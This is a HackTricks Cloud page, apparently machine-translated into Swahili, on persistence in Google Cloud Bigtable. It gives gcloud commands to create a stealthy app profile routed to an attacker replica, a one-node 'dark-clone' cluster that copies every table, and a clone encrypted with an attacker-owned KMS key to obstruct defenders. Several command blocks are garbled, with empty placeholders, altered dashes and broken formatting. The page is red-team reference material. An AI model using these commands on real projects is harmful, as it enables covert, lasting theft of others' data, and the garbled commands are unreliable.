GCP - Bigtable Uendelevu

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Bigtable

Kwa maelezo zaidi kuhusu Bigtable angalia:

GCP - Bigtable Enum

App Profile iliyotengwa kwa mshambuliaji

Ruhusa: bigtable.appProfiles.create, bigtable.appProfiles.update.

Tengeneza app profile inayolekeza trafiki kwenye replica cluster yako na wezesha Data Boost ili usitegemee nodi zilizotengwa ambazo watetezi wanaweza kugundua.

Tengeneza app profile ya kificho

```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

Iwapo wasifu hili litaendelea kuwepo, unaweza kuungana tena kwa kutumia credentials mpya zinazomrejea kwake.

### Dumisha cluster yako ya nakala

**Ruhusa:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Toa cluster yenye idadi ndogo ya node katika eneo tulivu. Hata kama vitambulisho vya wateja wako vitaondoka, **cluster itaweka nakala kamili ya kila jedwali** hadi watetezi waiondoe waziwazi.

<details>

<summary>Create replica cluster</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Ufuatilie kupitia gcloud bigtable clusters describe dark-clone --instance=<instance-id> ili uweze ku-scale up mara moja unaponahitaji kuvuta data.

Lock replication behind your own CMEK

Permissions: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt kwa attacker-owned key.

Leta KMS key yako unapo spin up clone. Bila key hiyo, Google haiwezi ku-re-create au ku-fail over cluster, hivyo blue teams lazima washirikiane nawe kabla ya kuigusa.

Unda cluster iliyolindwa na CMEK

```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

Zungusha au zima key katika project yako ili mara moja kufanya replica isiyoweza kutumika (lakini bado ukawa na uwezo wa kuiwasha tena baadaye).

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.